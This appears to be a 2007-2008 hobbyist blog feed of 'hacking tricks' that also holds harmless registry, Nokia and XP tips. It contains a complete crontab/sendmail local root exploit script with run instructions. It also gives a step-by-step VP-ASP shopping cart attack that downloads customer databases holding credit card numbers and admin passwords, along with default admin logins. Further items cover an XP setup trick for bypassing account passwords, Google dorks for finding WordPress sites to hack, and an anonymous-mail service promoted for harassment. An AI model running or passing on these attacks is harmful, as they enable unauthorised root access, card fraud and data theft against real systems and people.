* to the left of any folder, or just double-click on the folder. To display the contents of a key (folder), just click the desired key, and look at the values listed on the right side. You can add a new key or value by selecting New from the Edit menu, or by right-clicking your mouse. And you can rename any value and almost any key with the same method used to rename files; right-click on an object and click rename, or click on it twice (slowly), or just press F2 on the keyboard. Lastly, you can delete a key or value by clicking on it, and pressing Delete on the keyboard, or by right-clicking on it, and choosing Delete.

Note: it is always a good idea to backup your registry before making any changes to it. It can be intimidating to a new user, and there is always the possibility of changing or deleting a critical setting causing you to have to reinstall the whole operating system. It's much better to be safe than sorry!

A great feature of the Registry Editor is it's ability to import and export registry settings to a text file, this text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad, to do this using the Registry Editor select a key, then from the "Registry" menu choose "Export Registry File...", choose a filename and save. If you open this file in notepad you will see a file similar to the example below:
REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=dword:00000000
"CmdLine"="setup -newsetup"
"SystemPrefix"=hex:c5,0b,00,00,00,40,36,

02

The layout is quite simple, REGEDIT4 indicated the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicated the key the values are from, "SetupType"=dword:00000000 are the values themselves the portion after the "=" will vary depending on the type of value they are; DWORD, String or Binary.

So by simply editing this file to make the changes you want, it can then be easily distributed and all that need to be done is to double-click, or choose "Import" from the Registry menu, for the settings to be added to the system Registry.

It is also possible to delete keys and values using REG files. To delete a key start by using the same format as the the REG file above, but place a "-" symbol in front of the key name you want to delete. For example to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the reg file would look like this:
REGEDIT4

[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]

The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value "SetupType" the file would look like:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup]
"SetupType"=-

Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.

Regedit has a number of command line options to help automate it's use in either batch files or from the command prompt. Listed below are some of the options, please note the some of the functions are operating system specific.

* regedit.exe [options] [filename] [regpath]
* [filename] Import .reg file into the registry
* /s [filename] Silent import, i.e. hide confirmation box when importing files
* /e [filename] [regpath] Export the registry to [filename] starting at [regpath] e.g. regedit /e file.reg HKEY_USERS\.DEFAULT
* /L:system Specify the location of the system.dat to use
* /R:user Specify the location of the user.dat to use
* /C [filename] Compress (Windows 98)
* /D [regpath] Delete the specified key (Windows 98)

Hacking Windows-XP adnmin password....

noreply@blogger.com (Karthik) — Thu, 03 Jul 2008 14:39:00 +0000

Can't Log On to Windows XP?

# Place your Windows XP CD in your cd-rom and start your computer (it's assumed here that your XP CD is bootable as it should be - and that you have your bios set to boot from CD)
# Keep your eye on the screen messages for booting to your cd Typically, it will be "Press any key to boot from cd"
# Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.
# When you get to the Welcome to Setup screen, press ENTER to Setup Windows now
# The Licensing Agreement comes next - Press F8 to accept it.
# The next screen is the Setup screen which gives you the option to do a Repair.
It should read something like "If one of the following Windows XP installations is damaged, Setup can try to repair it"
Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.

# Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.
# Shortly after the Copying Files stage, you will be required to reboot. (this will happen automatically and you will see a progress bar stating "Your computer will reboot in 15 seconds"
# During the reboot, do not make the mistake of "pressing any key" to boot from the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.
# Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.
# At the prompt, type NUSRMGR.CPL and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.
# Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you've made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).
# Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password). Your programs and personalized settings should remain intact.

Sending Anonymous mails........

noreply@blogger.com (Karthik) — Mon, 30 Jun 2008 09:38:00 +0000

Now its very easy to send anonymous mails to anyone.
Just click below and signup and start sending anonymous mails to anyone you hate...
https://www.anonymousspeech.com

Folder lock without software........

noreply@blogger.com (Karthik) — Wed, 02 Apr 2008 08:03:00 +0000

--> Open Notepad
--> copy the below code and save with name 'locker.bat'
-->locker.bat
****Please don't forget to change your password in the code****
REPLACE "TYPE UR PASSWORD HERE" AND ENTER WHAT U WANT AS PASSWORD.
Now double click on locker .batFirst time start, it will create folder with Locker automatically for u.After creation of the Locker folder, place the contents u want to lockinside the Locker Folder and run locker.bat again. The Locker folderdisappears from the window. To make the folder available again,double click the locker.bat and enter the password.And you get your folder back!

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
goto UNLOCK
if NOT EXIST Locker
goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folderset/p "pass=>"
if NOT %pass%== TYPE UR PASSWORD HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid passwordgoto end:MDLOCKERmd Lockerecho Locker created successfully
goto End
:End

Hacking Shopping carts.......

noreply@blogger.com (Karthik) — Mon, 03 Mar 2008 11:38:00 +0000

This exploit is only for educational purpose and I meant no harm to anybody.Use at your own risk as it works........
SHOPADMINS ARE OF DIFFERENT COMPANIES LIKE : VP-ASP , X CART .. ETC ETC. I M POSTING TUTORIAL FOR HACKING VP-ASP SHOP.
hope youu seen on internet whenever u try to buy some thing on internet with cc they show u a well programmed form very secure, they are carts .. like vp-asp xcarts .. specific sites are not hacked but carts are hack.. below I am posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked and through their *mdb file you can get their clients ' credit card details ' and also login name and password of their admin area. and all other info of clients and comapny secrets.HERE WE GO ...
First we must find a website which uses this VP -ASP tye cart.To do this simply go to google.com
and search this string
intitle: VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
The page's URL will be like this > ****://***.victim.com/shop/shopdisplaycategories.asp
In that area type ****://***.victim.com/shop/diag_dbtest.asp and press enter.
You will find a database testing page with contents like
xDatabase: shopping140
xDblocation:resx etc..
For us important is that shopping140.Then in the url bar you have to enter
****://***.victim.com/shop/resx/shopping140.mdb
If you get an error message then you must enter
****://***.victim.com/shop/shopping500.mdb
You will download a file which has all info like credit card number or username and password etc.With this info go to address
****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
Username: admin
password: admin
or
Username: vpasp
password: vpasp

Be a script kiddie!

noreply@blogger.com (Karthik) — Tue, 29 Jan 2008 10:41:00 +0000

Unix Password Hacking...................
PERL CODE
#!/bin/sh
# Vixie crontab exploit
# Local user can gain root access
#Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Programmed by Karthik.P
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
echo
echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus"
echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"
echo
echo make shell
echo
cat > /tmp/sh.c << EOF
#include
#include
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",0);
return 0;
}
EOF
echo compile shell
echo
cc -o /tmp/sh /tmp/sh.c gcc -o /tmp/sh /tmp/sh.c
echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh
echo hack sendmail.cf
echo
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
sed 's/P=/usr/bin/procmail/P=/tmp/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3
echo make cron file
echo
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF
echo input cron file
echo
crontab /tmp/cronfile
echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait

echo execute shell
echo
/tmp/sh
echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null

To make this work:Cut away what comes before "#!/bin/sh" and after "crontab /dev/null", name it something like crontab_exploit.sh and do "chmod a+x crontab_exploit.sh".
then ./crontab_exploit.sh

GOOGLE HACKING THROUGH "inurl":

noreply@blogger.com (Karthik) — Tue, 29 Jan 2008 10:36:00 +0000

“inurl” is used to search within a site’s URL itself. This is very useful if you are familiar with a URL string or with standard URL strings used by different content management systems.
There are a host of other keywords in directory listings that you can use to explore web servers. Of course, we don’t recommend using these for malicious intent. Everything is for acemic purposes only, okay? Also, if you’re a webmaster, it helps to know if your own servers are not vulnerable to these “Google attacks.” You can even play the good samaritan by contacting owners of hosting accounts that blatantly put out their directory listings and thus endanger their host’s security.

Of course, it goes without saying that directory listings that aren’t at the root folder cannot be crawled by Google unless they are linked to directly on any other open website that Google can crawl. This means you can theoretically hide your directory from prying eyes even if it’s not locked out from viewing as long as you do not link to it from other sites. Also, it helps if you use long directory names that cannot be found in the dictionary.

Some examples
You can search for the words “admin” and “userlist” within the URL to come up with open directories that contain userlists.

inurl:admin inurl:userlist

You can also search for websites that use WordPress as their CMSes (even sites that are non-blogs).

inurl:wp-admin

You can use this in conjunction with the site: operator to get sites in that domain or domainspace that use WordPress as CMS (and perhaps you can try to hack them using known WordPress vulnerabilities, if any).
For example, this would give you a results page of all .US sites that use WordPress.

inurl:wp-admin +site:.us

XP genius

noreply@blogger.com (Karthik) — Fri, 21 Dec 2007 16:54:00 +0000

1- Private Character Editor
This program is for designing icons and Characters(Alphapet)Click :startThen :Runtype :EUDCEDIT

2- iExpress
This Program is for conerting your files to EXCUTABLE files
Click : startThen : runtype : iexpress

3-Disk Cleanup
This program used for cleaning harddisk to offer space
Click : startThen : runtype : cleanmgr

4-Dr Watson
This program Is for repairing problems in Windows
Click : startThen : runtype : drwtsn32

Nokia Mobile Tricks

noreply@blogger.com (Karthik) — Fri, 21 Dec 2007 16:47:00 +0000

*#3370# Activate Enhanced Full Rate Codec(EFR)-Your phone uses the best sound quality but talk time is reduced by approx 5%
*#3370# Deactivate Enhanced Full Rate Codec( EFR)
*#4720# Activate Half Rate Codec - Your phone uses a lower quality soundbut you should gain approx 30% more Talk Time
*#4720# Deactivate Half Rate Codec
*#0000# Displays your phones software version,1st Line : SoftwareVersion,2nd Line : Software ReleaseDate,3rd Line : Compression Type
*#9999# Phones software v ersion if
*#0000# does not work
*#06# For checking the International Mobile Equipment Identity (IMEI Number)5 #pw+1234567890+1# Provider Lock Status.(use the "*" button to obtain the "p,w" and "+" symbols)
6 #pw+1234567890+2# Network Lock Status.(use the "*" button to obtain the "p,w" and "+" symbols)
7 #pw+1234567890+3# Country Lock Status.(use the "*" button to obtain the "p,w" and "+" symbols)
8 #pw+1234567890+4# SIM Card Lock Status.(use the "*" button to obtain the "p,w" and "+" symbols)
9 *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodofone)
10 *#21# Allows you to check the number that "All Calls" are diverted To
11 *#2640# Displays security code in use
12 *#30# Lets you see the private number
13 *#43# Allows you to check the "Call Waiting" status of your phone.
14 *#61# Allows you to check the number that "On No Reply" calls are diverted to
15 *#62# Allows you to check the number that "Divert If Unrea chable(no service)" calls are diverted to
16 *#67# Allows you to check the number that "On Busy Calls" are diverted to
17 *#67705646# Removes operator logo on 3310 & 3330
18 *#73# Reset phone timers and game scores
19 *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature"SIM Clock Stop Allowed",it means you will get the best standby time possible
20 *#7760# Manufactures code
21 *#7780# Restorefa ctory settings
22 *#8110# Software version for the nokia 8110
23 *#92702689# (to rember *#WAR0ANTY#)Displays -1.Serial Number,2.Date Made3.Purchase Date,4.Date of lastrepair (0000 for no repairs),5.Transfer UserData.To exit this mode-you need to switch your phone off then on again
24 *#94870345123456789# Deactivate the PWM-Mem
25 **21*number# Turn on "All Calls" diverting to the phone number entered
26 **61*number# Turn on "No Reply" diverting to the phone number entered
27 **67*number# Turn on "On Busy" diverting to the phone number entered
28 12345 This is the default security code press and hold # Lets you switch between lines

XP TWEAKS!!

noreply@blogger.com (Karthik) — Wed, 28 Nov 2007 18:06:00 +0000

Hide ur drives
How to Hide the drives(c:,d:,e:,a:...etc)
How to Hide the drives(c:,d:,e:,a:...etc)
This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer.
1.Go to start->run.Type regedit.Now go to:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerNow in the right pane create a new DWORD item and name it NoDrives(it is case sensitive). Now modify it's value and set it to 3FFFFFF (Hexadecimal) .Now restart your computer. So, now when you click on My Computer, no drives will be shown(all gone...). To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again. Magic........lol....

SHUTDOWN UR PC IN ONE CLICK
Creating Shutdown Icon or One Click Shutdown:
Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut).
You should now see a pop-up window instructing you to enter a command line path.Use this path in "Type Location of the Item"SHUTDOWN -s -t 01
If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive.
Click the "Next" button.
Name the shortcut and click the "Finish" button.
Now whenever you want to shut down, just click on this shortcut and you're done.......